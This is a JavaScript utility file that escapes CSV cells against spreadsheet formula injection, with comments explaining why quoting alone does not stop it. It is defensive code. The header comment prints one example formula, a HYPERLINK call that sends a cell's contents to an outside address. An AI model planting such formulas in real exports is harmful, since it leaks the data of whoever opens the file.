/**
 * Writing a value into a CSV cell, safely.
 *
 * ⚠️ **THIS IS A SECURITY CONTROL, NOT A FORMATTING HELPER.** Excel, LibreOffice
 * and Google Sheets evaluate a cell beginning `=`, `+`, `-`, `@`, TAB or CR as a
 * FORMULA. So a value we merely PASS THROUGH — a provider's error string, a
 * geofence somebody named, a vehicle name a customer typed — becomes code
 * executing inside whoever opens the file. `=HYPERLINK("http://elsewhere/"&A1)`
 * exfiltrates the cell it names; there are worse.
 *
 * ⚠️ **QUOTING IS NOT A DEFENCE, and believing otherwise is how this survives a
 * review.** RFC-4180 quoting describes where a field STARTS AND ENDS; the
 * spreadsheet still evaluates what is inside it. The two rules are independent
 * and both are needed.
 *
 * ⚠️ **IT LIVES IN `@oip/contracts` BECAUSE THAT IS THE ONLY PACKAGE ALL ITS
 * CONSUMERS CAN SEE.** The report gateway emails CSVs to EXTERNAL recipients and
 * the web app exports every grid in the product; `@oip/domain` is not a
 * dependency of `apps/web` and never has been. A CSV escaper is a thin fit for a
 * package that otherwise holds the API's published vocabulary — but three copies
 * of a security control is the shape this codebase has paid for repeatedly, and
 * one home beats a comment asking people to remember.
 *
 * `@oip/log-store` keeps its OWN copy, deliberately: it is the one package with
 * no `@oip` dependencies at all, and adding one for four lines is poor value.
 * `apps/api/test/csv-injection-parity.test.ts` holds the two in step.
 */
/**
 * The characters a spreadsheet treats as the start of a formula.
 *
 * ⚠️ `-` is in the list and that is not an oversight: a cell reading `-1+1` is a
 * formula to Excel. The cost is that a genuine leading hyphen in TEXT gains a
 * visible apostrophe, which is the right way round — a reader can see the
 * apostrophe, and cannot see a formula that has already run.
 */
export const CSV_DANGEROUS_LEADING = /^[=+\-@\t\r]/;
/**
 * Render one value as a CSV field.
 *
 * ⚠️ **NEUTRALISATION APPLIES TO STRINGS ONLY.** A number is a quantity and must
 * stay summable: prefixing `-42` would turn a figure into text in every
 * spreadsheet that opened it, which breaks the charts and totals the export
 * exists for. A NEGATIVE NUMBER IS NOT AN ATTACK — it cannot be, because it was
 * never text somebody supplied.
 */
export function csvCell(value) {
    if (value === null || value === undefined)
        return '';
    if (typeof value === 'number')
        return String(value);
    const safe = CSV_DANGEROUS_LEADING.test(value) ? `'${value}` : value;
    /*
     * ⚠️ **`\r` AS WELL AS `\n`.** A bare CR inside an unquoted field ends the
     * record for a strict reader, so everything after it lands in the wrong column
     * — and the file still parses, which is why nobody notices. Both must be in
     * the test.
     */
    return /[",\r\n]/.test(safe) ? `"${safe.replace(/"/g, '""')}"` : safe;
}
/** One CSV record. Fields are comma-separated; the caller joins records. */
export function csvRow(values) {
    return values.map(csvCell).join(',');
}
//# sourceMappingURL=csv.js.map